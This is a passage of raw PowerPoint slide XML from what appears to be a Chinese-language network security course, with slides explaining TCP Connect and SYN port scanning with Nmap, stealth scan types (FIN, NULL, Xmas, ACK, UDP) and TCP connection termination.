            <a:off x="711844" y="5913586"/>
            <a:ext cx="1181100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>发起方</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382991" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6763394" y="3786336"/>
            <a:ext cx="1681163" cy="2127250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382992" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7279332" y="5996136"/>
            <a:ext cx="1181100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>应答方</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382993" name="Picture 17" descr="j0301260"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="710257" y="3840311"/>
            <a:ext cx="2046287" cy="1647825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="圖片 22" descr="nmap.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 y="2105886"/>
            <a:ext cx="4434531" cy="413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字方塊 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="6264292"/>
            <a:ext cx="36133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TW" altLang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>做</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>TCP Connect Scan</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US" sz="1400"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591485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a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>稳定可靠，不需要特殊的权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不隐蔽：会被日志记录（成功与否），容易被发现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2A55A8B9-EEF9-475A-A186-93EB886385B9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="743093271"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接的前两次握手</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>优点：隐蔽性较好，一般系统很少记录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺点：需超级用户或者授权用户访问专门系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>半开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{09AAC0CD-5DB7-470D-ADF2-FF7035842D14}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1602695" y="3501008"/>
            <a:ext cx="5964198" cy="2805113"/>
            <a:chOff x="1602695" y="3720231"/>
            <a:chExt cx="5964198" cy="2805113"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6951340" y="3872631"/>
              <a:ext cx="615553" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">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b="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="华文行楷" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>被扫描主机</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5528543" y="394883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开放的端口</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4766543" y="49394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不提供服务的端口</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4690343" y="58538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防火墙过滤的端口</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1602695" y="3872631"/>
              <a:ext cx="553998" cy="2438400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">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b="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="华文行楷" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>扫描器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2175743" y="4025031"/>
              <a:ext cx="33528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Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2251943" y="5015631"/>
              <a:ext cx="24384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 name="Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2251943" y="6006231"/>
              <a:ext cx="24384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 name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2785343" y="37202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6" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2785343" y="46346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7" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2785343" y="57014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8" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2251943" y="4177431"/>
              <a:ext cx="32004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Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2175743" y="5168031"/>
              <a:ext cx="25146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0" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2251943" y="6158631"/>
              <a:ext cx="24384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1" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3623543" y="417743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itchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN+ACK</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="6600FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>握手</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3166343" y="516803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itchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>RST </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="1">
                  <a:solidFill>
                    <a:srgbClr val="6600FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>重置</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2480543" y="6158631"/>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i="1">
                  <a:solidFill>
                    <a:srgbClr val="6600FF"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>没有回应或者其他</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336841777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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Xmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其他扫描技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E31186BA-654F-4C97-9CC0-A3E1AEE28067}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3882724942"/>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44256731-90CA-45CB-83EE-CE1691F357D4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49156" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接的终止</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227331" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2678113"/>
            <a:ext cx="0" cy="3343275"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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227332" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5534025" y="2678113"/>
            <a:ext cx="0" cy="3343275"/>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49159" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2581275" y="1601788"/>
            <a:ext cx="771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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：客户端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49160"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5238" y="1885950"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6370638" y="1525588"/>
            <a:ext cx="771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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：服务端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49162"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809750"/>
            <a:ext cx="8175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p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1565275" y="2593975"/>
            <a:ext cx="3968750" cy="585788"/>
            <a:chOff x="986" y="1345"/>
            <a:chExt cx="2500" cy="369"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227338" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2514" y="1552"/>
              <a:ext cx="972" cy="162"/>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85" name="Group 11"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="986" y="1345"/>
              <a:ext cx="262" cy="287"/>
              <a:chOff x="293" y="1677"/>
              <a:chExt cx="262" cy="287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227340" name="Oval 12"/>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88" name="Rectangle 13"/>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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49186" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1344" y="1392"/>
              <a:ext cx="1056"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FIN</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>分段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="3355975"/>
            <a:ext cx="4010025" cy="738188"/>
            <a:chOff x="2514" y="1825"/>
            <a:chExt cx="2526" cy="465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227344" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
